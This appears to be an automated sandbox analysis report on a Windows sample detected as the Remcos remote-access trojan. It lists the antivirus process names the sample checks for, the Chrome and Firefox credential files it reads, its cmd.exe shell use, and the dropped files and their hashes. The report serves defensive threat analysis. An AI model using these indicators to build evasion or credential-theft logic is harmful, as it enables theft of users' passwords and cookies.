Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: Amcache.hve.14.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp, nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, Amcache.hve.14.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		11_2_0320BA4D
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data		21_2_02E8BA4D

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	11_2_0320BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \key3.db	11_2_0320BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	21_2_02E8BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: \key3.db	21_2_02E8BB6B

Remote Access Functionality

Yara detected Remcos RAT

Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR

Contains functionality to launch a control a shell (cmd.exe)

Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: cmd.exe		11_2_0320569A
Source: C:\Windows\SysWOW64\colorcpl.exe	Code function: cmd.exe		21_2_02E8569A

Windows Analysis Report
nft438A5fN.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1562863
Product:	CloudBasic
Start time:	08:11:10
Start date:	26.11.2024
Sample:	nft438A5fN.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	1a4d920b70293f85958a9a2cde581f6f
SHA1:	756015ae8f1b03f14bc1126e6b2183a383631186
SHA256:	02eec111ba55308c1d91c49ee08cb2d6c00d50893596ceef03f7664403175617
Filetype:	Win32 Executable (generic) a (10002005/4) 99.81%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SndVol.exe_2a34d4499138a07f93f374c737745cafe30b7df_15f2fd1e_2ed2e291-1011-42c6-840c-dbd314cdf520\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	778B3CD893DACD26410077273CE276C1	9898516459F2B9D8C39A9DF49CBA1DA4F56C62A7	C6F5126DFD92B52DC0E974736712FAEEFED5854237C830AFD1C71822D4EB88A5
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_SndVol.exe_30a7c05382919c22758b99127e1564cf8a12d6a0_15f2fd1e_6f6af954-d08e-4f2a-95c1-614b15e172ca\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	0BDDF48CE866876B6BFD742FDED7BE05	4953E567A4F1083E9BE4F472A1A27D239D1CB5D8	A349F9C634858DE0B40E4F013C0E125BA7E9B11EFEF7CF8E953C73F74D4F160F
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_colorcpl.exe_175fe811589184573733f29f8d90926c9d3acb6_ddba1c1d_896fd093-19ca-4a1e-8301-677a8a25e309\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	1006FDC20595F2D503BEC15827611CFD	62DEC411E2B369CE02C0360ED7F30CBA69906F27	C3502BC20C0ACB2EF14C64A5EE2419C7001F6511907096051F488C6EFC6B8768
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_colorcpl.exe_3c3ed7f6d1b6f2b663d0a68a61f2223ae3ea1ea_ddba1c1d_100e9fa7-8485-408d-890e-a42f32003c03\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	1231C97EB85593591E46B9665D4BA009	45C872A1FC79E8DBEA82EB1FD2087FE5BFBD5811	1D9D96C86DB652FC4F20D13A4C4B2CE6900B19BE6A06287C8AFAE877FE04B78F
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_colorcpl.exe_e08f44738a680ff1812c472f8c239d2dca1238f_ddba1c1d_97cf7208-2971-4814-be7b-50919cf9034b\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	B5888C2ACD92FE57BBBA6B9EAFBFF5BF	A47161B1C679E41EE3C93F2CAD7898ABEE97F1B2	9888E659A650D8ADBF16FA8F1CEF7D433CE048D642AECEA5C5D94882FC54E1D3
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_colorcpl.exe_e08f44738a680ff1812c472f8c239d2dca1238f_ddba1c1d_dae9bb0e-fa00-4fd8-8cf0-dc60dd63b84a\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	76B1E5EC91D888A7DC96691BF2215B65	A456DAA86EB007E36EF88A40BEE165E4688F5D0F	81B04C0FB27C4BF68EB05EA95E31AF2FE14C89406F899FD5236E8F105E41CC38
C:\ProgramData\Microsoft\Windows\WER\Temp\WER810D.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:26 2024, 0x1205a4 type	4F204BD4BC9450E60A12A7431A5220CD	8CCBEA9011066A8EA7CDABCA8D88161C03FE66BA	17E950A829DB0C131B82E5F723AD1FD9CFD59038090D25146E46993BA75B4126
C:\ProgramData\Microsoft\Windows\WER\Temp\WER82C3.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	428907974789DB8B866C20565768CA7E	77D08ED4A87921483D3F6BD399BFFB50E486B1AE	6B067F4DF8AA73379B33041ECC63C75A26C7CD4CA5E1ACD27F1D5446868EABEB
C:\ProgramData\Microsoft\Windows\WER\Temp\WER8322.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	688A84428A31C69EF169CEC935047655	D0D50510134DD9E4D3A5DA5F8BB14587A976CFD5	447D59A46C78DF8D64996391D29AC762919E0A19443B25E35969245256B4C9E9
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB2A.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:37 2024, 0x1205a4 type	9855477C490AFDAB2B59BDF1F73411E8	AF80C1E2EBAC7C1F6F4532844312A36A7CD117F4	BEC4F7D05000C9CBF665542A4EFF4642FAA17C18402E1248AA48BA7736C31FD6
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAC44.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	59CD62E30B307C4372C3CD2AB614C600	2C9973C0133AD26885FA16AC82370BF226C6C9F8	4DAE69A65783C4C8D0A10805A1143111DB03D9FC1A52B52F8AA121E37963FD87
C:\ProgramData\Microsoft\Windows\WER\Temp\WERACE2.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	7A1E5E7ED9CFA2732348A79C5778F59B	1B0F46205522FBE3F2B498A50A1CB5A2C3C3BB18	BB0CFB253794CA11025AA8C46C28D2C3A3BC11995CDA6BA8B909C60B8DBE9273
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB5F8.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:39 2024, 0x1205a4 type	860331CD4832C4C333022E578C941324	402EDB176E54B174A4254CBA1A36B614841D1D38	DB83C6CEB8F051C927CC4B0C0B3F134B76EAA794E7D61756F8B5951FBD5D7C65
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB695.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	21449DAE87F8E521DC7836EADABB668D	0001503F0D070530996D51A43EF0D2F121D63E27	B7DF83C9A2A095C4DBAECF0180E041C99C5213F8DD3E819E582FA99193AEE765
C:\ProgramData\Microsoft\Windows\WER\Temp\WERB6C5.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	24F892C6852BF7E1013FAA133F5D0FD8	47579327E5EC7BD7BE84D6735908E6D6B48BC4D8	187BDF2085303616E31FCA909D88C83369CD6B885EEEE56D28F585B60B23C945
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC2C9.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:43 2024, 0x1205a4 type	C64870AFD1BA6A0AB29FD72B343FCF04	EA7F9711B7202E9B1DC632B0208A6152E66BDB3A	6939A6A78A7C57EF1AF025C1FDBC8AD4F06E2B3F4E68302CEA730150467578DB
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3B4.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	E57AA7EB8A949D5DE52C6EC41F8258AE	3D4D82809045E2E7B134DD149551B1AF9D0A9504	7D2498A259DB88F97A7B4487C5A98F9073F7318F7413714A95CF326EFAD7B80E
C:\ProgramData\Microsoft\Windows\WER\Temp\WERC3F4.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	14A50A80D69058F92DA76D2EE95596A5	34616670EC5E55B9DE7372BFF79DB25A11DFCF65	D5E1C0C24AAA502EA82F6964BA4DFC3067BADE122F14A6C1DE57C74C379136A0
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCD29.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:45 2024, 0x1205a4 type	EC4B975BABF8774A7FA38EA40FE4F8B5	09F663393E27607A48C0916B161F3DBB1074B7D2	0A1976E12F20225B1BDDE89E5EBDAB384C0FA381E9D73BA9BF863662357C0B23
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE53.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	FFEC970F7D345CEB383A1344EB429D0B	33CDA6E0248E0E7E4ABEF5A484E534B86B9908BA	69F4E6A294C8FBB71F659DA76817EB32391DD323AC49F09FAFB5A71AC98188BB
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE73.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	1ED9D975D08F67D552B0DB7E78755FC1	A4EFC3322531D305EB6F9AC03AEF8414FC35760C	F14F65A6252BEB4EC9B4AC3330DE7EA398F0AD0AC34E85D07C8670DECCD71222
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE351.tmp.dmp	Mini DuMP crash report, 14 streams, Tue Nov 26 07:12:51 2024, 0x1205a4 type	76760AA35BE69277AABD02EF9765C709	5115F1B60468B49E58C19670400AD2816C09CBBE	BBC05D3FFE1C8B8241FDB61974F02D24DCCDB1522EA229C03D7A7D80E47958E8
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE40E.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	304B3F4AE34EFA6DDE43A344E8392138	58F9F102F75BB77D83B89158BE068B01F1121AF3	1370DAD663149BA599A7095E57A772ADA657A972A00584D052EDB1D76F0C0DC6
C:\ProgramData\Microsoft\Windows\WER\Temp\WERE42E.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	5C67EBF630D1EB0E2031B86240B87928	C58B50811EC01910E431FF5319242E6439FEEF42	1E75C062BF7CBAE47A9B37F37CADF5FA085A91C120B0CA9A9FA5F2B81C27A950
C:\Users\Public\Libraries\PNO	ASCII text, with CRLF line terminators	17A1D5E252F7DEA2B5162C7E8CE55239	0796EB344F59291ECB828FB4307BF831314A72DC	8C094FA7A36D960F46EB971614F084207C9A037D28C4B42B622F887EFE455D99
C:\Users\Public\Libraries\Wuqtggvo	OpenPGP Public Key	864518C2AAECE1BCAABEC65C2F3A9926	43685959B153D4BBE722D57B227ABB3614483E7C	F896A2CE7170D361C69C487E2A04F41408F4241BB42630574DFE09CE94832B5D
C:\Users\Public\Libraries\Wuqtggvo.PIF	PE32 executable (GUI) Intel 80386, for MS Windows	1A4D920B70293F85958A9A2CDE581F6F	756015AE8F1B03F14BC1126E6B2183A383631186	02EEC111BA55308C1D91C49EE08CB2D6C00D50893596CEEF03F7664403175617
C:\Users\Public\Libraries\ovggtquW.cmd	DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators	B87F096CBC25570329E2BB59FEE57580	D281D1BF37B4FB46F90973AFC65EECE3908532B2	D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
C:\Users\Public\Wuqtggvo.url	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF">), ASCII text, with CRLF line terminators	000F5057DD458226A681D694D834A61F	E362607B872F49D1ABD195FF6B58B2D55BBDE539	C1977F492C8A48A643E8950C7BB1B3B719A64FC3414EC0BDE950A45108983D6D
C:\Users\Public\alpha.pif	PE32 executable (console) Intel 80386, for MS Windows	D0FCE3AFA6AA1D58CE9FA336CC2B675B	4048488DE6BA4BFEF9EDF103755519F1F762668F	4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
C:\Users\Public\xpha.pif	PE32 executable (console) Intel 80386, for MS Windows	B3624DD758CCECF93A1226CEF252CA12	FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7	4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	626D8717F3E7E21039967F7D6F41C763	40C2616DB3DFE75DE18A08C446924BF670CACD27	59E03BD370EB4CD18DE4CD773D53CF87C52284B5B0A609C8ECB4DC3DD64B44E7
\Device\ConDrv	ASCII text, with CRLF, CR line terminators	3B12CE324B1724A35CE83A7E4AF2D3AD	49E2BE1BC9C6750E55E0A36651ACA814CDE99232	A2EA6C0DEA1DFF281DD18E008AD7BA5FCC64B4CA3A057EEB716360176FEDC4C8
\Device\Null	ASCII text, with CRLF, CR line terminators	EE7187E169AF0EDE104977788ECC390D	5A796ECD0808A540F708BFA4C43FF5295B324F23	2E0D33DC849A7490058C38486E17F33365411663130ABCBDBA5A2293646B07CB

Windows Analysis Report nft438A5fN.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Exploits

Privilege Escalation

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
nft438A5fN.exe

Malware Threat Intel
Provided by